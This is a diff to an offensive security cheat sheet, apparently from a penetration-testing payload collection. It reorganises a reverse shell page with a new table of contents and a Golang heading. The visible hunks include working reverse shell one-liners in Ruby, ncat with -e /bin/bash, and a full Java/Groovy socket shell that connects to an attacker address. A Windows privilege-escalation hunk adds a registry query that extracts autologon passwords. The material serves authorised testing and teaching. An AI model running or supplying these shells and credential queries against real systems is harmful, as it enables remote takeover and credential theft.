Reverse shell summary + golang

Methodology and Resources/Reverse Shell Cheatsheet.md

@@ -1,6 +1,30 @@
-# Reverse Shell Methods
+# Reverse Shell Cheat Sheet
 
-## Reverse Shell Cheat Sheet
+## Summary
+
+* [Reverse Shell](#reverse-shell)
+    * [Bash TCP](#bash-tcp)
+    * [Bash UDP](#bash-udp)
+    * [Perl](#perl)
+    * [Python](#python)
+    * [PHP](#php)
+    * [Ruby](#ruby)
+    * [Goland](#golang)
+    * [Netcat Traditional](#netcat-traditional)
+    * [Netcat OpenBsd](#netcat-openbsd)
+    * [Ncat](#ncat)
+    * [OpenSSL](#openssl)
+    * [Powershell](#powershell)
+    * [Awk](#awk)
+    * [Java](#java)
+    * [War](#war)
+    * [Lua](#lua)
+    * [NodeJS](#nodejs)
+    * [Groovy](#groovy)
+* [Spawn TTY Shell](#spawn-tty-shell)
+* [References](#references)
+
+## Reverse Shell
 
 ### Bash TCP
 
@@ -77,6 +101,7 @@ ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.
 NOTE: Windows only
 ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
 ```
+
 ### Golang
 
 ```bash
@@ -102,7 +127,7 @@ ncat 127.0.0.1 4444 -e /bin/bash
 ncat --udp 127.0.0.1 4444 -e /bin/bash
 ```
 
-## OpenSSL
+### OpenSSL
 
 ```powershell
 hacker@kali$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
@@ -194,8 +219,9 @@ or
 https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
 ```
 
-### Groovy - by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
+### Groovy
 
+by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
 NOTE: Java reverse shell also work for Groovy
 
 ```javascript
@@ -205,7 +231,7 @@ String cmd="cmd.exe";
 Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
 ```
 
-## Spawn TTY
+## Spawn TTY Shell
 
 Access shortcuts, su, nano and autocomplete in a partially tty shell
 /!\ OhMyZSH might break this trick, a simple `sh` is recommended

Methodology and Resources/Windows - Privilege Escalation.md

@@ -209,6 +209,7 @@ REG QUERY HKLM /F "password" /t REG_SZ /S /K
 REG QUERY HKCU /F "password" /t REG_SZ /S /K
 
 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
+reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" 
 reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
 reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
 reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials